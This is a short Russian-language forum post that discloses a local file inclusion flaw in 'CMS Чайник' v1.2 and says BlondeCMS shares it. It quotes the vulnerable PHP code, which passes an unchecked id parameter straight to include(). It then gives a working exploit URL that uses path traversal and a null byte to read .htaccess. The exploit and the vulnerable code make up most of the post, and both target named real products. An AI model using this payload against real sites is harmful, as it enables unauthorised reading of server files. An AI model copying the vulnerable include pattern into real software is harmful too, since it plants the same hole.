FriLL
Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
|
CMS Чайник - http://www.cms-chaynik.ru/ v.1.2 LFI(index.php) if (isset($_GET ['id']))
{
$id = $_GET ['id'];
}
else
{
$id = $index;
}
if (file_exists ("content/" . $id . ".php"))
{
include ("content/" . $id . ".php");
} Expl: http://localhost/cms/index.php?id=../.htaccess%00 Этой же уязвимости и подвержен BlondeCMS (http://blondecms.ru/)
|